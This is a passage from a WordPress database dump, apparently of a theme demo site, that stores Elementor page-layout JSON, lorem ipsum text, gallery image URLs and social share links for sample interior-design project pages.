dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\",\"_element_width\":\"auto\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"28\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"651e2be\",\"elType\":\"widget\",\"settings\":{\"title\":\"Challenges\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"511b8d6\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Nemo enim ipsam voluptatem quia voluptas.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"3c4c4f1\"},{\"text\":\"Accusamus et iusto odio dignissimos ducimus.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"d2e876c\"},{\"text\":\"Nam libero tempore, cum soluta nobis est eligend.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"c278a85\"},{\"_id\":\"09ef8b9\",\"text\":\"Accusamus et iusto odio dignissimos ducimus.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"}}],\"icon_color\":\"#E3B25A\",\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"7\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"ba13071\",\"elType\":\"widget\",\"settings\":{\"editor\":\"When an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged.\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1a21bde\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e07fdc8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/image.jpg\",\"id\":217,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"371f27c\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"57\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"bf6cd47\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"0d63b10\",\"elType\":\"widget\",\"settings\":{\"title\":\"After\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d81044d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Neque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\",\"_element_width\":\"auto\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"28\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"0aee7db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Results\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f175404\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Nemo enim ipsam voluptatem quia voluptas.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"3c4c4f1\"},{\"text\":\"Accusamus et iusto odio dignissimos ducimus.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"d2e876c\"},{\"text\":\"Nam libero tempore, cum soluta nobis est eligend.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"c278a85\"},{\"_id\":\"09ef8b9\",\"text\":\"Accusamus et iusto odio dignissimos ducimus.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"}}],\"icon_color\":\"#E3B25A\",\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"7\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"9ea358c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"When an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged.\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"31a15cb\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"7d872da\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/image-2.jpg\",\"id\":230,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"53c42ec\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7a47171\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"fa8ab1a\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our gallery\",\"title\":\" Photo gallery\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"8a40fc1\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"ova_elementor_photo_gallery\"}],\"isInner\":false}],\"isInner\":false}]'),(1048,665,'_elementor_page_assets','a:0:{}'),(1049,665,'_thumbnail_id','1163'),(1051,677,'ova_project_gallery','a:3:{i:589;s:74:\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-1.jpg\";i:590;s:74:\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-2.jpg\";i:591;s:74:\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-3.jpg\";}'),(1052,677,'ova_project_service','Interior design'),(1053,677,'ova_project_architect','Mike hardson'),(1054,677,'ova_project_duration','4.5 Months'),(1055,677,'ova_project_location','Broklyn, New York'),(1056,677,'_elementor_edit_mode','builder'),(1057,677,'_elementor_template_type','wp-post'),(1058,677,'_elementor_version','3.6.6'),(1059,677,'ova_project_group_icon','a:4:{i:0;a:2:{s:29:\"ova_project_class_icon_social\";s:14:\"fab fa-twitter\";s:23:\"ova_project_link_social\";s:89:\"https://twitter.com/share?url=https://demo.ovatheme.com/retirio/project/cozy-living-room/\";}i:1;a:2:{s:29:\"ova_project_class_icon_social\";s:15:\"fab fa-facebook\";s:23:\"ova_project_link_social\";s:96:\"http://www.facebook.com/sharer.php?u=https://demo.ovatheme.com/retirio/project/cozy-living-room/\";}i:2;a:2:{s:29:\"ova_project_class_icon_social\";s:18:\"fab fa-pinterest-p\";s:23:\"ova_project_link_social\";s:104:\"https://pinterest.com/pin/create/button/?url=https://demo.ovatheme.com/retirio/project/cozy-living-room/\";}i:3;a:2:{s:29:\"ova_project_class_icon_social\";s:16:\"fab fa-instagram\";s:23:\"ova_project_link_social\";s:90:\"https://www.instagram.com/?url=https://demo.ovatheme.com/retirio/project/cozy-living-room/\";}}'),(1060,677,'_wp_page_template','default'),(1061,677,'_elementor_data','[{\"id\":\"73dfd34\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"d61f611\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":60},\"elements\":[{\"id\":\"37265f2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Cozy living room\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":36,\"sizes\":[]},\"typography_font_weight\":\"900\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"8\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8b80d2d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Neque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\",\"typography_typography\":\"custom\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"13\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9eb6ca4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Biophilia is the idea that humans possess an innate tendency to seek connections with nature. The term translates\",\"header_size\":\"h4\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"typography_line_height\":{\"unit\":\"em\",\"size\":1.4,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"c1f2c5a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"When an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e228a97\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"_inline_size_tablet\":40},\"elements\":[{\"id\":\"ab36771\",\"elType\":\"widget\",\"settings\":{\"item_padding_tablet\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":false},\"item_padding_mobile\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"0\",\"bottom\":\"015\",\"left\":\"015\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"ova_elementor_data_project\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96bd9a7\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ea6b0ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"103fd8d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Before\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"84cdfaf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Neque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\",\"_element_width\":\"auto\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"28\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"651e2be\",\"elType\":\"widget\",\"settings\":{\"title\":\"Challenges\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"511b8d6\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Nemo enim ipsam voluptatem quia voluptas.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"3c4c4f1\"},{\"text\":\"Accusamus et iusto odio dignissimos ducimus.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"d2e876c\"},{\"text\":\"Nam libero tempore, cum soluta nobis est eligend.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"c278a85\"},{\"_id\":\"09ef8b9\",\"text\":\"Accusamus et iusto odio dignissimos ducimus.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"}}],\"icon_color\":\"#E3B25A\",\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"7\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"ba13071\",\"elType\":\"widget\",\"settings\":{\"editor\":\"When an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged.\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1a21bde\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e07fdc8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/image.jpg\",\"id\":217,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"371f27c\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"57\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"bf6cd47\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"0d63b10\",\"elType\":\"widget\",\"settings\":{\"title\":\"After\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d81044d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Neque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\",\"_element_width\":\"auto\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"28\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"0aee7db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Results\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f175404\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Nemo enim ipsam voluptatem quia voluptas.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"3c4c4f1\"},{\"text\":\"Accusamus et iusto odio dignissimos ducimus.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"d2e876c\"},{\"text\":\"Nam libero tempore, cum soluta nobis est eligend.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"c278a85\"},{\"_id\":\"09ef8b9\",\"text\":\"Accusamus et iusto odio dignissimos ducimus.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"}}],\"icon_color\":\"#E3B25A\",\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"7\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"9ea358c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"When an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged.\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"31a15cb\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"7d872da\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/image-2.jpg\",\"id\":230,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"53c42ec\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7a47171\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"fa8ab1a\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our gallery\",\"title\":\" Photo gallery\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"8a40fc1\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"ova_elementor_photo_gallery\"}],\"isInner\":false}],\"isInner\":false}]'),(1062,677,'_elementor_page_assets','a:0:{}'),(1063,677,'_thumbnail_id','1165'),(1065,684,'ova_project_gallery','a:3:{i:589;s:74:\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-1.jpg\";i:590;s:74:\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-2.jpg\";i:591;s:74:\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-3.jpg\";}'),(1066,684,'ova_project_service','Interior design'),(1067,684,'ova_project_architect','Mike hardson'),(1068,684,'ova_project_duration','4.5 Months'),(1069,684,'ova_project_location','Broklyn, New York'),(1070,684,'_elementor_edit_mode','builder'),(1071,684,'_elementor_template_type','wp-post'),(1072,684,'_elementor_version','3.6.6'),(1073,684,'ova_project_group_icon','a:4:{i:0;a:2:{s:29:\"ova_project_class_icon_social\";s:14:\"fab fa-twitter\";s:23:\"ova_project_link_social\";s:91:\"https://twitter.com/share?url=https://demo.ovatheme.com/retirio/project/greater-commercial/\";}i:1;a:2:{s:29:\"ova_project_class_icon_social\";s:15:\"fab fa-facebook\";s:23:\"ova_project_link_social\";s:98:\"http://www.facebook.com/sharer.php?u=https://demo.ovatheme.com/retirio/project/greater-commercial/\";}i:2;a:2:{s:29:\"ova_project_class_icon_social\";s:18:\"fab fa-pinterest-p\";s:23:\"ova_project_link_social\";s:106:\"https://pinterest.com/pin/create/button/?url=https://demo.ovatheme.com/retirio/project/greater-commercial/\";}i:3;a:2:{s:29:\"ova_project_class_icon_social\";s:16:\"fab fa-instagram\";s:23:\"ova_project_link_social\";s:92:\"https://www.instagram.com/?url=https://demo.ovatheme.com/retirio/project/greater-commercial/\";}}'),(1074,684,'_wp_page_template','default'),(1075,684,'_elementor_data','[{\"id\":\"73dfd34\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"d61f611\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":60},\"elements\":[{\"id\":\"37265f2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Greater commercial\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":36,\"sizes\":[]},\"typography_font_weight\":\"900\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"8\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8b80d2d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Neque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\",\"typography_typography\":\"custom\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"13\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9eb6ca4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Biophilia is the idea that humans possess an innate tendency to seek connections with nature. The term translates\",\"header_size\":\"h4\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"typography_line_height\":{\"unit\":\"em\",\"size\":1.4,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"c1f2c5a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"When an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e228a97\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"_inline_size_tablet\":40},\"elements\":[{\"id\":\"ab36771\",\"elType\":\"widget\",\"settings\":{\"item_padding_tablet\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":false},\"item_padding_mobile\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"0\",\"bottom\":\"015\",\"left\":\"015\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"ova_elementor_data_project\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96bd9a7\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ea6b0ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"103fd8d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Before\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"84cdfaf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Neque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\",\"_element_width\":\"auto\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"28\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"651e2be\",\"elType\":\"widget\",\"settings\":{\"title\":\"Challenges\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"511b8d6\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Nemo enim ipsam voluptatem quia voluptas.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"3c4c4f1\"},{\"text\":\"Accusamus et iusto odio dignissimos ducimus.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"d2e876c\"},{\"text\":\"Nam libero tempore, cum soluta nobis est eligend.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"c278a85\"},{\"_id\":\"09ef8b9\",\"text\":\"Accusamus et iusto odio dignissimos ducimus.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"}}],\"icon_color\":\"#E3B25A\",\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"7\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"ba13071\",\"elType\":\"widget\",\"settings\":{\"editor\":\"When an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially 